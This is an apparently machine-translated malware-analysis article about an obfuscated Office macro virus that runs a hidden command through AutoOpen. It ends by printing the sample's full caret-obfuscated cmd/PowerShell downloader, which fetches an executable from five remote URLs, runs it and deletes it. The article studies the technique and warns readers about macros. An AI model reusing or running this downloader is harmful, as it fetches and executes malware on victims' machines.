Shulou(Shulou.com)06/02 Report--

This article will explain in detail the example analysis of various code confusion Office macro viruses for you. The content of the article is of high quality, so the editor shares it for you as a reference. I hope you will have some understanding of the relevant knowledge after reading this article.

Preface

In order to avoid some soft-killing static detection, some macro viruses use some obfuscation means to make the script more difficult to detect, usually by dynamic obfuscation decryption to achieve its purpose.

Analysis.

Let's take a real virus practice to analyze, test environment: Win7x64+Office2010, virus sample sample.doc (MD5: a564137f74ea2d65f8538faf89ef3897), search in VirusTotal can find that it has been detected by the vast majority of anti-soft.

Using Office to open sample.doc prompts you to open the macro (actually a picture, in case the user's machine does not open the macro, prompting the user to open it to achieve the purpose of infection)

Open the macro and see that the AutoOpen () function is started automatically, and the VBA code is basically confused and difficult to understand.

Use F8 to debug and navigate to the location where Shell invokes external commands.

Here you can see that the CMD command is called to execute a bat string script

This code is confused at first glance. There is a "^" symbol in it. In fact, it is just a trick. This symbol has no practical meaning. Cmd will ignore this character during execution. (test cmd.exe on windows to open "c ^ a ^ c. ^ e ^ x ^ e", you can open the calculator calc.exe.), but I copied this script on win10 has been blocked by windows defender, indicating that Microsoft has added rule to detect such scripts. After finishing, I found that it is still a piece of code that is difficult to understand. If you are interested, it is easier to read the script by yourself. Here I will run it directly to see the effect.

If you copy this script to cmd, you will find that cmd starts powershell.exe to execute a code.

This paragraph is a little easier to understand, it tries to download an exe file from url to the public directory, but finds that the size 0 download failed and the url link is no longer valid. (if you are careful, you will find that it actually tries to download the exe file from 5 url.) the file will be deleted later.

Since this sample has been blocked and the download link has been disabled, it is impossible to study what the downloaded exe does. Sharing this article is to show that obfuscating code has become a common means of viruses. Office is a commonly used office software, it is recommended that you use Office when macro security settings disable macros, do not easily open unknown sources of office files.

The footnotes analyzed in this article are listed below so that interested friends can study how to encrypt and decrypt bat scripts.

CMd / V: ^ on / C "^ e ^ t ^ t ^ k ^ b = ^ ^} ^ ^ {hc ^ TAC ^ ^ ^; ^ k ^ a ^ b ^ ^; n ^ t ^ I ^ $m ^ et ^ I ^-e ^ k ^ ovn ^ I ^;) NTI ^ $^, KC ^ GI ^ lnw ^ D ^. Atz $^ {^ yrt{) ^ h^ frs ^ n ^ n ^ i^ KC ^ G ^ $(^ hc ^ a ^ erer ^ of ^ ^; ^ ^ e ^ x ^ e.^ ^ + YC ^ f ^ $^ ^ + c ^ I ^ bupp ^: vnee = ntI^; ^ ^ ^ 457 ^ ^ KC ^ G ^ $(^ hc ^ a ^ erer ^ of ^ ^; ^ ^ e ^ x ^ e.^ ^ + YCFC ^ $^ ^ n = ntIupb ^ ^ )^'^@^'(^t^i^l^p^S^.^'^I^3^B^k^S^S^h^6/^ur^.^5^5z^u^o^s^f^or^p//^:^p^t^t^h@^Gi^K^L^J^3^D^h^q^u/^gro^.c^e^dr^a^ka^d^ivav^iv//^:^p^t^t^h^@^f^H^T^P^O^i^7/^z^y^x^.^a^b^a^b^m^e^kr^o^g//^:^p^t^t^h^@^7^P^u^F^w^q^B^p^XV/^m^oc^.^k^p^k^a^s^p//^:p^t^t^h@^o^b2^qdn^B^p/^m^oc^.c^m^d^tc^a^p^moc//^:^p^t^t^h^'=^h^fr^$^;^tn^e^i^lC^b^e^W.^t^eN^ ^tc^e^j^bo^-^w^en^=^A^t^z^$^ ^l^l^e^hsr^ew^o^p&&^f^or /^L %^X ^in (^3^6^6^;^-^1; ^ 0) ^ d ^ o ^ e ^ t ^ Sr ^ u ^ J =! ^ Sr ^ u ^ J!! r ^ k ^ w ^ b: ~% ^ X ^ c ^ l% ^ x = ^ 0c ^ a ^ l% ^ Sr ^ u ^ J: ^ ~ ^ 6% "this is the end of the example analysis of various codes confusing Office macro viruses. I hope the above content can be helpful and learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.